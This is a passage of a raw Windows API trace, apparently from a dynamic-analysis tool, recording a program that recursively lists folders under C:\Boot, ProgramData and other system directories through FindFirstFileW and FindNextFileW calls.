lpFindFileData=0x32af1e0) returned 1 [0111.599] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.599] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.599] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0111.600] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.600] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c0e0 [0111.600] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.600] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.600] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.600] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.601] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0111.601] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.601] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\de-DE\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c0e0 [0111.601] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.601] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.601] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.601] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.601] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0111.601] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.601] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c0e0 [0111.601] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.601] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.601] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.601] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.602] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0111.602] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.602] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\en-US\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c0e0 [0111.602] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.602] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.602] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.602] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.602] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.602] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0111.602] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.602] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\es-ES\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c0e0 [0111.602] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.602] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.602] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.603] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.603] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0111.603] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fi-FI\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c0e0 [0111.603] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.603] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.603] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.603] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.603] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0111.603] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.603] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\Fonts\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c0e0 [0111.603] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.603] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.603] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.603] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.603] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.603] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.604] FindNextFileW (in: hFindFile=0x29c0e0, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.604] FindClose (in: hFindFile=0x29c0e0 | out: hFindFile=0x29c0e0) returned 1 [0111.604] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x306bef8 | out: hHeap=0x1db0000) returned 1 [0111.604] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.767] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.767] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.767] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.767] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.767] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.767] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.767] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.767] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.767] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.767] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.767] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.767] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.767] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.767] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.767] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\it-IT\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.768] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.768] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.768] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.768] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.768] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.768] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.768] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ja-JP\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.768] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.768] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.768] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.768] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.768] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.768] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.769] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ko-KR\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.769] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.769] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.769] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.769] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.769] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.769] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.769] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.769] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nb-NO\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.769] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.769] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.769] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.769] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.769] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.769] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.769] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\nl-NL\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.770] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.770] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.770] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.770] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.770] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.770] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pl-PL\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.770] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.770] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.770] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.770] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.770] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.770] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.770] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-BR\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.770] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.770] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.770] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.770] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.771] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.771] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.771] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\pt-PT\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.771] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.771] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.771] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.771] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.771] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.771] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.771] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\ru-RU\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.771] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.771] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.771] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.771] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.771] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.771] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.772] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\sv-SE\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.772] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.772] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.772] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.772] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.772] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.772] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.772] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\tr-TR\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.772] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.772] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.772] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.772] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.772] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.772] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-CN\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.773] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.773] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.773] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.773] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.773] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.773] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-HK\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.773] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.773] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.773] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.773] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.773] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.773] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.773] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\zh-TW\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.773] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.773] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.773] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0 [0111.774] FindClose (in: hFindFile=0x29c120 | out: hFindFile=0x29c120) returned 1 [0111.774] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x309bf10 | out: hHeap=0x1db0000) returned 1 [0111.774] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 0 [0111.774] FindClose (in: hFindFile=0x29c020 | out: hFindFile=0x29c020) returned 1 [0111.774] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x305bef0 | out: hHeap=0x1db0000) returned 1 [0111.775] FindNextFileW (in: hFindFile=0x29bfe0, lpFindFileData=0x32af6e8 | out: lpFindFileData=0x32af6e8) returned 1 [0111.775] FindNextFileW (in: hFindFile=0x29bfe0, lpFindFileData=0x32af6e8 | out: lpFindFileData=0x32af6e8) returned 1 [0111.775] FindNextFileW (in: hFindFile=0x29bfe0, lpFindFileData=0x32af6e8 | out: lpFindFileData=0x32af6e8) returned 1 [0111.775] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Config.Msi\\*", lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 0xffffffff [0111.775] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x305bef0 | out: hHeap=0x1db0000) returned 1 [0111.775] FindNextFileW (in: hFindFile=0x29bfe0, lpFindFileData=0x32af6e8 | out: lpFindFileData=0x32af6e8) returned 1 [0111.775] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Documents and Settings\\*", lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 0xffffffff [0111.775] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x305bef0 | out: hHeap=0x1db0000) returned 1 [0111.775] FindNextFileW (in: hFindFile=0x29bfe0, lpFindFileData=0x32af6e8 | out: lpFindFileData=0x32af6e8) returned 1 [0111.775] FindNextFileW (in: hFindFile=0x29bfe0, lpFindFileData=0x32af6e8 | out: lpFindFileData=0x32af6e8) returned 1 [0111.775] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\*", lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 0xffffffff [0111.776] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x305bef0 | out: hHeap=0x1db0000) returned 1 [0111.776] FindNextFileW (in: hFindFile=0x29bfe0, lpFindFileData=0x32af6e8 | out: lpFindFileData=0x32af6e8) returned 1 [0111.776] FindNextFileW (in: hFindFile=0x29bfe0, lpFindFileData=0x32af6e8 | out: lpFindFileData=0x32af6e8) returned 1 [0111.776] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\*", lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 0xffffffff [0111.776] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x305bef0 | out: hHeap=0x1db0000) returned 1 [0111.776] FindNextFileW (in: hFindFile=0x29bfe0, lpFindFileData=0x32af6e8 | out: lpFindFileData=0x32af6e8) returned 1 [0111.776] FindNextFileW (in: hFindFile=0x29bfe0, lpFindFileData=0x32af6e8 | out: lpFindFileData=0x32af6e8) returned 1 [0111.776] FindNextFileW (in: hFindFile=0x29bfe0, lpFindFileData=0x32af6e8 | out: lpFindFileData=0x32af6e8) returned 1 [0111.776] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\*", lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 0x29c020 [0111.793] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.793] FindNextFileW (in: hFindFile=0x29c020, lpFindFileData=0x32af464 | out: lpFindFileData=0x32af464) returned 1 [0111.793] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\*", lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 0x29c120 [0111.793] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.793] FindNextFileW (in: hFindFile=0x29c120, lpFindFileData=0x32af1e0 | out: lpFindFileData=0x32af1e0) returned 1 [0111.794] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\*", lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 0x29c160 [0111.794] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 1 [0111.794] FindNextFileW (in: hFindFile=0x29c160, lpFindFileData=0x32aef5c | out: lpFindFileData=0x32aef5c) returned 1 [0111.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0x29c1a0 [0111.795] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.795] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 1 [0111.795] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0x29c1e0 [0111.797] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.797] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 1 [0111.797] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0x29c220 [0111.797] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 1 [0111.797] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 1 [0111.797] FindNextFileW (in: hFindFile=0x29c220, lpFindFileData=0x32ae7d0 | out: lpFindFileData=0x32ae7d0) returned 0 [0111.797] FindClose (in: hFindFile=0x29c220 | out: hFindFile=0x29c220) returned 1 [0111.797] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30dbf30 | out: hHeap=0x1db0000) returned 1 [0111.797] FindNextFileW (in: hFindFile=0x29c1e0, lpFindFileData=0x32aea54 | out: lpFindFileData=0x32aea54) returned 0 [0111.798] FindClose (in: hFindFile=0x29c1e0 | out: hFindFile=0x29c1e0) returned 1 [0111.798] HeapFree (in: hHeap=0x1db0000, dwFlags=0x0, lpMem=0x30cbf28 | out: hHeap=0x1db0000) returned 1 [0111.798] FindNextFileW (in: hFindFile=0x29c1a0, lpFindFileData=0x32aecd8 | out: lpFindFileData=0x32aecd8) returned 0 